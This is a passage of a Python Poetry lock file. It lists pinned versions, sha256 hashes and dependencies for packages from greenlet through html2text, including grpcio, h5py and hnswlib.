"greenlet-3.0.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8060b32d8586e912a7b7dac2d15b28dbbd63a174ab32f5bc6d107a1c4143f40b"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:621fcb346141ae08cb95424ebfc5b014361621b8132c48e538e34c3c93ac7365"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6bb36985f606a7c49916eff74ab99399cdfd09241c375d5a820bb855dfb4af9f"}, {file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:10b5582744abd9858947d163843d323d0b67be9432db50f8bf83031032bc218d"}, {file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f351479a6914fd81a55c8e68963609f792d9b067fb8a60a042c585a621e0de4f"}, {file = "greenlet-3.0.0-cp38-cp38-win32.whl", hash = "sha256:9de687479faec7db5b198cc365bc34addd256b0028956501f4d4d5e9ca2e240a"}, {file = "greenlet-3.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:3fd2b18432e7298fcbec3d39e1a0aa91ae9ea1c93356ec089421fabc3651572b"}, {file = "greenlet-3.0.0-cp38-universal2-macosx_11_0_x86_64.whl", hash = "sha256:3c0d36f5adc6e6100aedbc976d7428a9f7194ea79911aa4bf471f44ee13a9464"}, {file = "greenlet-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:4cd83fb8d8e17633ad534d9ac93719ef8937568d730ef07ac3a98cb520fd93e4"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6a5b2d4cdaf1c71057ff823a19d850ed5c6c2d3686cb71f73ae4d6382aaa7a06"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e7dcdfad252f2ca83c685b0fa9fba00e4d8f243b73839229d56ee3d9d219314"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c94e4e924d09b5a3e37b853fe5924a95eac058cb6f6fb437ebb588b7eda79870"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ad6fb737e46b8bd63156b8f59ba6cdef46fe2b7db0c5804388a2d0519b8ddb99"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d55db1db455c59b46f794346efce896e754b8942817f46a1bada2d29446e305a"}, {file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:56867a3b3cf26dc8a0beecdb4459c59f4c47cdd5424618c08515f682e1d46692"}, {file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9a812224a5fb17a538207e8cf8e86f517df2080c8ee0f8c1ed2bdaccd18f38f4"}, {file = "greenlet-3.0.0-cp39-cp39-win32.whl", hash = "sha256:0d3f83ffb18dc57243e0151331e3c383b05e5b6c5029ac29f754745c800f8ed9"}, {file = "greenlet-3.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:831d6f35037cf18ca5e80a737a27d822d87cd922521d18ed3dbc8a6967be50ce"}, {file = "greenlet-3.0.0-cp39-universal2-macosx_11_0_x86_64.whl", hash = "sha256:a048293392d4e058298710a54dfaefcefdf49d287cd33fb1f7d63d55426e4355"}, {file = "greenlet-3.0.0.tar.gz", hash = "sha256:19834e3f91f485442adc1ee440171ec5d9a4840a1f7bd5ed97833544719ce10b"}, ] [package.extras] docs = ["Sphinx"] test = ["objgraph", "psutil"] [[package]] name = "grpcio" version = "1.59.0" description = "HTTP/2-based RPC framework" optional = true python-versions = ">=3.7" files = [ {file = "grpcio-1.59.0-cp310-cp310-linux_armv7l.whl", hash = "sha256:225e5fa61c35eeaebb4e7491cd2d768cd8eb6ed00f2664fa83a58f29418b39fd"}, {file = "grpcio-1.59.0-cp310-cp310-macosx_12_0_universal2.whl", hash = "sha256:b95ec8ecc4f703f5caaa8d96e93e40c7f589bad299a2617bdb8becbcce525539"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_aarch64.whl", hash = 
"sha256:1a839ba86764cc48226f50b924216000c79779c563a301586a107bda9cbe9dcf"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f6cfe44a5d7c7d5f1017a7da1c8160304091ca5dc64a0f85bca0d63008c3137a"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0fcf53df684fcc0154b1e61f6b4a8c4cf5f49d98a63511e3f30966feff39cd0"}, {file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:fa66cac32861500f280bb60fe7d5b3e22d68c51e18e65367e38f8669b78cea3b"}, {file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8cd2d38c2d52f607d75a74143113174c36d8a416d9472415eab834f837580cf7"}, {file = "grpcio-1.59.0-cp310-cp310-win32.whl", hash = "sha256:228b91ce454876d7eed74041aff24a8f04c0306b7250a2da99d35dd25e2a1211"}, {file = "grpcio-1.59.0-cp310-cp310-win_amd64.whl", hash = "sha256:ca87ee6183421b7cea3544190061f6c1c3dfc959e0b57a5286b108511fd34ff4"}, {file = "grpcio-1.59.0-cp311-cp311-linux_armv7l.whl", hash = "sha256:c173a87d622ea074ce79be33b952f0b424fa92182063c3bda8625c11d3585d09"}, {file = "grpcio-1.59.0-cp311-cp311-macosx_10_10_universal2.whl", hash = "sha256:ec78aebb9b6771d6a1de7b6ca2f779a2f6113b9108d486e904bde323d51f5589"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_aarch64.whl", hash = "sha256:0b84445fa94d59e6806c10266b977f92fa997db3585f125d6b751af02ff8b9fe"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c251d22de8f9f5cca9ee47e4bade7c5c853e6e40743f47f5cc02288ee7a87252"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:956f0b7cb465a65de1bd90d5a7475b4dc55089b25042fe0f6c870707e9aabb1d"}, {file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:38da5310ef84e16d638ad89550b5b9424df508fd5c7b968b90eb9629ca9be4b9"}, {file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:63982150a7d598281fa1d7ffead6096e543ff8be189d3235dd2b5604f2c553e5"}, {file = "grpcio-1.59.0-cp311-cp311-win32.whl", hash = "sha256:50eff97397e29eeee5df106ea1afce3ee134d567aa2c8e04fabab05c79d791a7"}, {file = "grpcio-1.59.0-cp311-cp311-win_amd64.whl", hash = "sha256:15f03bd714f987d48ae57fe092cf81960ae36da4e520e729392a59a75cda4f29"}, {file = "grpcio-1.59.0-cp312-cp312-linux_armv7l.whl", hash = "sha256:f1feb034321ae2f718172d86b8276c03599846dc7bb1792ae370af02718f91c5"}, {file = "grpcio-1.59.0-cp312-cp312-macosx_10_10_universal2.whl", hash = "sha256:d09bd2a4e9f5a44d36bb8684f284835c14d30c22d8ec92ce796655af12163588"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_aarch64.whl", hash = "sha256:2f120d27051e4c59db2f267b71b833796770d3ea36ca712befa8c5fff5da6ebd"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ba0ca727a173ee093f49ead932c051af463258b4b493b956a2c099696f38aa66"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5711c51e204dc52065f4a3327dca46e69636a0b76d3e98c2c28c4ccef9b04c52"}, {file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:d74f7d2d7c242a6af9d4d069552ec3669965b74fed6b92946e0e13b4168374f9"}, {file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:3859917de234a0a2a52132489c4425a73669de9c458b01c9a83687f1f31b5b10"}, {file = "grpcio-1.59.0-cp312-cp312-win32.whl", hash = "sha256:de2599985b7c1b4ce7526e15c969d66b93687571aa008ca749d6235d056b7205"}, {file = "grpcio-1.59.0-cp312-cp312-win_amd64.whl", hash = 
"sha256:598f3530231cf10ae03f4ab92d48c3be1fee0c52213a1d5958df1a90957e6a88"}, {file = "grpcio-1.59.0-cp37-cp37m-linux_armv7l.whl", hash = "sha256:b34c7a4c31841a2ea27246a05eed8a80c319bfc0d3e644412ec9ce437105ff6c"}, {file = "grpcio-1.59.0-cp37-cp37m-macosx_10_10_universal2.whl", hash = "sha256:c4dfdb49f4997dc664f30116af2d34751b91aa031f8c8ee251ce4dcfc11277b0"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:61bc72a00ecc2b79d9695220b4d02e8ba53b702b42411397e831c9b0589f08a3"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f367e4b524cb319e50acbdea57bb63c3b717c5d561974ace0b065a648bb3bad3"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:849c47ef42424c86af069a9c5e691a765e304079755d5c29eff511263fad9c2a"}, {file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c0488c2b0528e6072010182075615620071371701733c63ab5be49140ed8f7f0"}, {file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:611d9aa0017fa386809bddcb76653a5ab18c264faf4d9ff35cb904d44745f575"}, {file = "grpcio-1.59.0-cp37-cp37m-win_amd64.whl", hash = "sha256:e5378785dce2b91eb2e5b857ec7602305a3b5cf78311767146464bfa365fc897"}, {file = "grpcio-1.59.0-cp38-cp38-linux_armv7l.whl", hash = "sha256:fe976910de34d21057bcb53b2c5e667843588b48bf11339da2a75f5c4c5b4055"}, {file = "grpcio-1.59.0-cp38-cp38-macosx_10_10_universal2.whl", hash = "sha256:c041a91712bf23b2a910f61e16565a05869e505dc5a5c025d429ca6de5de842c"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:0ae444221b2c16d8211b55326f8ba173ba8f8c76349bfc1768198ba592b58f74"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ceb1e68135788c3fce2211de86a7597591f0b9a0d2bb80e8401fd1d915991bac"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c4b1cc3a9dc1924d2eb26eec8792fedd4b3fcd10111e26c1d551f2e4eda79ce"}, {file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:871371ce0c0055d3db2a86fdebd1e1d647cf21a8912acc30052660297a5a6901"}, {file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:93e9cb546e610829e462147ce724a9cb108e61647a3454500438a6deef610be1"}, {file = "grpcio-1.59.0-cp38-cp38-win32.whl", hash = "sha256:f21917aa50b40842b51aff2de6ebf9e2f6af3fe0971c31960ad6a3a2b24988f4"}, {file = "grpcio-1.59.0-cp38-cp38-win_amd64.whl", hash = "sha256:14890da86a0c0e9dc1ea8e90101d7a3e0e7b1e71f4487fab36e2bfd2ecadd13c"}, {file = "grpcio-1.59.0-cp39-cp39-linux_armv7l.whl", hash = "sha256:34341d9e81a4b669a5f5dca3b2a760b6798e95cdda2b173e65d29d0b16692857"}, {file = "grpcio-1.59.0-cp39-cp39-macosx_10_10_universal2.whl", hash = "sha256:986de4aa75646e963466b386a8c5055c8b23a26a36a6c99052385d6fe8aaf180"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:aca8a24fef80bef73f83eb8153f5f5a0134d9539b4c436a716256b311dda90a6"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:936b2e04663660c600d5173bc2cc84e15adbad9c8f71946eb833b0afc205b996"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc8bf2e7bc725e76c0c11e474634a08c8f24bcf7426c0c6d60c8f9c6e70e4d4a"}, {file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:81d86a096ccd24a57fa5772a544c9e566218bc4de49e8c909882dae9d73392df"}, {file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = 
"sha256:2ea95cd6abbe20138b8df965b4a8674ec312aaef3147c0f46a0bac661f09e8d0"}, {file = "grpcio-1.59.0-cp39-cp39-win32.whl", hash = "sha256:3b8ff795d35a93d1df6531f31c1502673d1cebeeba93d0f9bd74617381507e3f"}, {file = "grpcio-1.59.0-cp39-cp39-win_amd64.whl", hash = "sha256:38823bd088c69f59966f594d087d3a929d1ef310506bee9e3648317660d65b81"}, {file = "grpcio-1.59.0.tar.gz", hash = "sha256:acf70a63cf09dd494000007b798aff88a436e1c03b394995ce450be437b8e54f"}, ] [package.extras] protobuf = ["grpcio-tools (>=1.59.0)"] [[package]] name = "grpcio-status" version = "1.48.2" description = "Status proto mapping for gRPC" optional = true python-versions = ">=3.6" files = [ {file = "grpcio-status-1.48.2.tar.gz", hash = "sha256:53695f45da07437b7c344ee4ef60d370fd2850179f5a28bb26d8e2aa1102ec11"}, {file = "grpcio_status-1.48.2-py3-none-any.whl", hash = "sha256:2c33bbdbe20188b2953f46f31af669263b6ee2a9b2d38fa0d36ee091532e21bf"}, ] [package.dependencies] googleapis-common-protos = ">=1.5.5" grpcio = ">=1.48.2" protobuf = ">=3.12.0" [[package]] name = "grpcio-tools" version = "1.48.2" description = "Protobuf code generator for gRPC" optional = true python-versions = ">=3.6" files = [ {file = "grpcio-tools-1.48.2.tar.gz", hash = "sha256:8902a035708555cddbd61b5467cea127484362decc52de03f061a1a520fe90cd"}, {file = "grpcio_tools-1.48.2-cp310-cp310-linux_armv7l.whl", hash = "sha256:92acc3e10ba2b0dcb90a88ae9fe1cc0ffba6868545207e4ff20ca95284f8e3c9"}, {file = "grpcio_tools-1.48.2-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:e5bb396d63495667d4df42e506eed9d74fc9a51c99c173c04395fe7604c848f1"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_aarch64.whl", hash = "sha256:84a84d601a238572d049d3108e04fe4c206536e81076d56e623bd525a1b38def"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:70564521e86a0de35ea9ac6daecff10cb46860aec469af65869974807ce8e98b"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bdbbe63f6190187de5946891941629912ac8196701ed2253fa91624a397822ec"}, {file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ae56f133b05b7e5d780ef7e032dd762adad7f3dc8f64adb43ff5bfabd659f435"}, {file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0feb4f2b777fa6377e977faa89c26359d4f31953de15e035505b92f41aa6906"}, {file = "grpcio_tools-1.48.2-cp310-cp310-win32.whl", hash = "sha256:80f450272316ca0924545f488c8492649ca3aeb7044d4bf59c426dcdee527f7c"}, {file = "grpcio_tools-1.48.2-cp310-cp310-win_amd64.whl", hash = "sha256:21ff50e321736eba22210bf9b94e05391a9ac345f26e7df16333dc75d63e74fb"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-linux_armv7l.whl", hash = "sha256:d598ccde6338b2cfbb3124f34c95f03394209013f9b1ed4a5360a736853b1c27"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-macosx_10_10_x86_64.whl", hash = "sha256:a43d26714933f23de93ea0bf9c86c66a6ede709b8ca32e357f9e2181703e64ae"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_aarch64.whl", hash = "sha256:55fdebc73fb580717656b1bafa4f8eca448726a7aa22726a6c0a7895d2f0f088"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8588819b22d0de3aa1951e1991cc3e4b9aa105eecf6e3e24eb0a2fc8ab958b3e"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9771d4d317dca029dfaca7ec9282d8afe731c18bc536ece37fd39b8a974cc331"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_i686.whl", hash = 
"sha256:d886a9e052a038642b3af5d18e6f2085d1656d9788e202dc23258cf3a751e7ca"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:d77e8b1613876e0d8fd17709509d4ceba13492816426bd156f7e88a4c47e7158"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-win32.whl", hash = "sha256:dcaaecdd5e847de5c1d533ea91522bf56c9e6b2dc98cdc0d45f0a1c26e846ea2"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-win_amd64.whl", hash = "sha256:0119aabd9ceedfdf41b56b9fdc8284dd85a7f589d087f2694d743f346a368556"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-linux_armv7l.whl", hash = "sha256:189be2a9b672300ca6845d94016bdacc052fdbe9d1ae9e85344425efae2ff8ef"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-macosx_10_10_x86_64.whl", hash = "sha256:9443f5c30bac449237c3cf99da125f8d6e6c01e17972bc683ee73b75dea95573"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:e0403e095b343431195db1305248b50019ad55d3dd310254431af87e14ef83a2"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5410d6b601d1404835e34466bd8aee37213489b36ee1aad2276366e265ff29d4"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be91b7c7056ff9ee48b1eccd4a2840b0126230803a5e09dfc082a5b16a91c1"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:516eedd5eb7af6326050bc2cfceb3a977b9cc1144f283c43cc4956905285c912"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d18599ab572b2f15a8f3db49503272d1bb4fcabb4b4d1214ef03aca1816b20a0"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-win32.whl", hash = "sha256:d18ef2adc05a8ef9e58ac46357f6d4ce7e43e077c7eda0a4425773461f9d0e6e"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6d9753944e5a6b6b78b76ce9d2ae0fe3f748008c1849deb7fadcb64489d6553b"}, {file = "grpcio_tools-1.48.2-cp38-cp38-linux_armv7l.whl", hash = "sha256:3c8749dca04a8d302862ceeb1dfbdd071ee13b281395975f24405a347e5baa57"}, {file = "grpcio_tools-1.48.2-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:7307dd2408b82ea545ae63502ec03036b025f449568556ea9a056e06129a7a4e"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:072234859f6069dc43a6be8ad6b7d682f4ba1dc2e2db2ebf5c75f62eee0f6dfb"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6cc298fbfe584de8876a85355efbcf796dfbcfac5948c9560f5df82e79336e2a"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f75973a42c710999acd419968bc79f00327e03e855bbe82c6529e003e49af660"}, {file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:f766050e491d0b3203b6b85638015f543816a2eb7d089fc04e86e00f6de0e31d"}, {file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:8e0d74403484eb77e8df2566a64b8b0b484b5c87903678c381634dd72f252d5e"}, {file = "grpcio_tools-1.48.2-cp38-cp38-win32.whl", hash = "sha256:cb75bac0cd43858cb759ef103fe68f8c540cb58b63dda127e710228fec3007b8"}, {file = "grpcio_tools-1.48.2-cp38-cp38-win_amd64.whl", hash = "sha256:cabc8b0905cedbc3b2b7b2856334fa35cce3d4bc79ae241cacd8cca8940a5c85"}, {file = "grpcio_tools-1.48.2-cp39-cp39-linux_armv7l.whl", hash = "sha256:e712a6d00606ad19abdeae852a7e521d6f6d0dcea843708fecf3a38be16a851e"}, {file = "grpcio_tools-1.48.2-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:e7e7668f89fd598c5469bb58e16bfd12b511d9947ccc75aec94da31f62bc3758"}, {file = 
"grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:a415fbec67d4ff7efe88794cbe00cf548d0f0a5484cceffe0a0c89d47694c491"}, {file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d96e96ae7361aa51c9cd9c73b677b51f691f98df6086860fcc3c45852d96b0b0"}, {file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e20d7885a40e68a2bda92908acbabcdf3c14dd386c3845de73ba139e9df1f132"}, {file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:8a5614251c46da07549e24f417cf989710250385e9d80deeafc53a0ee7df6325"}, {file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ace0035766fe01a1b096aa050be9f0a9f98402317e7aeff8bfe55349be32a407"}, {file = "grpcio_tools-1.48.2-cp39-cp39-win32.whl", hash = "sha256:4fa4300b1be59b046492ed3c5fdb59760bc6433f44c08f50de900f9552ec7461"}, {file = "grpcio_tools-1.48.2-cp39-cp39-win_amd64.whl", hash = "sha256:0fb6c1c1e56eb26b224adc028a4204b6ad0f8b292efa28067dff273bbc8b27c4"}, ] [package.dependencies] grpcio = ">=1.48.2" protobuf = ">=3.12.0,<4.0dev" setuptools = "*" [[package]] name = "h11" version = "0.14.0" description = "A pure-Python, bring-your-own-I/O implementation of HTTP/1.1" optional = false python-versions = ">=3.7" files = [ {file = "h11-0.14.0-py3-none-any.whl", hash = "sha256:e3fe4ac4b851c468cc8363d500db52c2ead036020723024a109d37346efaa761"}, {file = "h11-0.14.0.tar.gz", hash = "sha256:8f19fbbe99e72420ff35c00b27a34cb9937e902a8b810e2c88300c6f0a3b699d"}, ] [[package]] name = "h2" version = "4.1.0" description = "HTTP/2 State-Machine based protocol implementation" optional = true python-versions = ">=3.6.1" files = [ {file = "h2-4.1.0-py3-none-any.whl", hash = "sha256:03a46bcf682256c95b5fd9e9a99c1323584c3eec6440d379b9903d709476bc6d"}, {file = "h2-4.1.0.tar.gz", hash = "sha256:a83aca08fbe7aacb79fec788c9c0bac936343560ed9ec18b82a13a12c28d2abb"}, ] [package.dependencies] hpack = ">=4.0,<5" hyperframe = ">=6.0,<7" [[package]] name = "h5py" version = "3.10.0" description = "Read and write HDF5 files from Python" optional = true python-versions = ">=3.8" files = [ {file = "h5py-3.10.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b963fb772964fc1d1563c57e4e2e874022ce11f75ddc6df1a626f42bd49ab99f"}, {file = "h5py-3.10.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:012ab448590e3c4f5a8dd0f3533255bc57f80629bf7c5054cf4c87b30085063c"}, {file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:781a24263c1270a62cd67be59f293e62b76acfcc207afa6384961762bb88ea03"}, {file = "h5py-3.10.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42e6c30698b520f0295d70157c4e202a9e402406f50dc08f5a7bc416b24e52d"}, {file = "h5py-3.10.0-cp310-cp310-win_amd64.whl", hash = "sha256:93dd840bd675787fc0b016f7a05fc6efe37312a08849d9dd4053fd0377b1357f"}, {file = "h5py-3.10.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2381e98af081b6df7f6db300cd88f88e740649d77736e4b53db522d8874bf2dc"}, {file = "h5py-3.10.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:667fe23ab33d5a8a6b77970b229e14ae3bb84e4ea3382cc08567a02e1499eedd"}, {file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:90286b79abd085e4e65e07c1bd7ee65a0f15818ea107f44b175d2dfe1a4674b7"}, {file = "h5py-3.10.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c013d2e79c00f28ffd0cc24e68665ea03ae9069e167087b2adb5727d2736a52"}, {file = 
"h5py-3.10.0-cp311-cp311-win_amd64.whl", hash = "sha256:92273ce69ae4983dadb898fd4d3bea5eb90820df953b401282ee69ad648df684"}, {file = "h5py-3.10.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:3c97d03f87f215e7759a354460fb4b0d0f27001450b18b23e556e7856a0b21c3"}, {file = "h5py-3.10.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:86df4c2de68257b8539a18646ceccdcf2c1ce6b1768ada16c8dcfb489eafae20"}, {file = "h5py-3.10.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba9ab36be991119a3ff32d0c7cbe5faf9b8d2375b5278b2aea64effbeba66039"}, {file = "h5py-3.10.0-cp312-cp312-win_amd64.whl", hash = "sha256:2c8e4fda19eb769e9a678592e67eaec3a2f069f7570c82d2da909c077aa94339"}, {file = "h5py-3.10.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:492305a074327e8d2513011fa9fffeb54ecb28a04ca4c4227d7e1e9616d35641"}, {file = "h5py-3.10.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:9450464b458cca2c86252b624279115dcaa7260a40d3cb1594bf2b410a2bd1a3"}, {file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd6f6d1384a9f491732cee233b99cd4bfd6e838a8815cc86722f9d2ee64032af"}, {file = "h5py-3.10.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3074ec45d3dc6e178c6f96834cf8108bf4a60ccb5ab044e16909580352010a97"}, {file = "h5py-3.10.0-cp38-cp38-win_amd64.whl", hash = "sha256:212bb997a91e6a895ce5e2f365ba764debeaef5d2dca5c6fb7098d66607adf99"}, {file = "h5py-3.10.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5dfc65ac21fa2f630323c92453cadbe8d4f504726ec42f6a56cf80c2f90d6c52"}, {file = "h5py-3.10.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d4682b94fd36ab217352be438abd44c8f357c5449b8995e63886b431d260f3d3"}, {file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aece0e2e1ed2aab076c41802e50a0c3e5ef8816d60ece39107d68717d4559824"}, {file = "h5py-3.10.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:43a61b2c2ad65b1fabc28802d133eed34debcc2c8b420cb213d3d4ef4d3e2229"}, {file = "h5py-3.10.0-cp39-cp39-win_amd64.whl", hash = "sha256:ae2f0201c950059676455daf92700eeb57dcf5caaf71b9e1328e6e6593601770"}, {file = "h5py-3.10.0.tar.gz", hash = "sha256:d93adc48ceeb33347eb24a634fb787efc7ae4644e6ea4ba733d099605045c049"}, ] [package.dependencies] numpy = ">=1.17.3" [[package]] name = "hnswlib" version = "0.7.0" description = "hnswlib" optional = true python-versions = "*" files = [ {file = "hnswlib-0.7.0.tar.gz", hash = "sha256:bc459668e7e44bb7454b256b90c98c5af750653919d9a91698dafcf416cf64c4"}, ] [package.dependencies] numpy = "*" [[package]] name = "hpack" version = "4.0.0" description = "Pure-Python HPACK header compression" optional = true python-versions = ">=3.6.1" files = [ {file = "hpack-4.0.0-py3-none-any.whl", hash = "sha256:84a076fad3dc9a9f8063ccb8041ef100867b1878b25ef0ee63847a5d53818a6c"}, {file = "hpack-4.0.0.tar.gz", hash = "sha256:fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095"}, ] [[package]] name = "html2text" version = "2020.1.16" description = "Turn HTML into equivalent Markdown-structured text." optional = true python-versions = ">=3.5" files = [ {file = "html2text-2020.1.16-py3-none-any.whl", hash = 